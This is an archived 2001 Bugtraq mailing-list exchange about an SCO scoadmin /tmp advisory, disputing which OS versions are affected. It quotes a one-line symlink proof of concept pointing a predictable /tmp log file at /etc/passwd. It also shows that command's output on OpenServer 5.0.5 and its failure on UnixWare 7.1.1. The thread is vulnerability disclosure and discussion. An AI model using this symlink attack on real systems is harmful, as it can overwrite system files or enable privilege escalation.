OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: KRFinisterrecheckfree.com
Date: Wed May 23 2001 - 12:56:35 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    I am sorry it was a typo the os is as follows.

    SCO_SV unixdev 3.2 5.0.5 i386
    $ ln -s /etc/passwd /tmp/tclerror.1195.log
    $ ls -al /tmp/tclerror.1195.log
     lrwxrwxrwx 1 kevin supp 11 May 23 13:47
    /tmp/tclerror.1195.log -> /etc/passwd

                                                                                           
                        Matt Schalit
                        <mschalitpac To: Richard Johnson <thiefsnosoft.com>
                        bell.net> cc: bugtraqsecurityfocus.com,
                                             "ReconSnosoft. Com" <reconsnosoft.com>
                        05/23/01 Subject: Re: [SRT2001-10] - scoadmin /tmp
                        01:39 PM issues
                                                                                           
                                                                                           

    Hello Sir:

    Richard Johnson wrote:
    >
    > ======================================================================
    > Strategic Reconnaissance Team Security Advisory(SRT2001-09)
    > Topic: scoadmin /tmp issues
    > Vendor: Santa Cruz Operations
    > Release Date: 05/07/01
    > ======================================================================

    [snip...]

    > .: Systems Affected
    > Unixware 5.x

      You bring to light various issues with software issued by the
    "Santa Cruz Operations" (sic). I'm sure they would prefer that
    you call them by their correct name, the Santa Cruz Operation, or
    simple SCO.

      The SCO server division has been acquired by Caldera, and
    www.sco.com now points you to Caldera, for those of you who
    may not know.

      SCO has two OS lines that have the following release history:

        UnixWare OpenServer
      ------------------ --------------------------
       ... ...
       Unixware 2.1.2 Unix System 5 Release 3.2v4.0
       Unixware 2.1.3 Unix System 5 Release 3.2.4.2
       Unixware 7.0.0 OpenServer 5.0.0
       Unixware 7.0.1 OpenServer 5.0.2
       Unixware 7.1.0 OpenServer 5.0.4
       Unixware 7.1.1 <-- Current OpenServer 5.0.5
                                            OpenServer 5.0.6 <--- Current.

    I spent about 15 minutes searching the net and the ng's for any reference
    to a "UnixWare 5" or a "UnixWare 5.x" that you refer to with no success.

    Would you please clarify for the rest of us exactly what OS you
    see this problem with. Please include the output of

          uname -a

    > .: Proof of Concept
    > ln -s /etc/passwd /tmp/tclerror.1195.log

    This doesn't work on UnixWare 7.1.1.

       $ ln -s /etc/passwd /tmp/tclerror.1195.log
       UX:ln: ERROR: Cannot create /tmp/tclerror.1195.log: Not privileged

    Regards,
    Matthew Schalit
    SCO ACE, Maintainer of the Uw7 FAQ.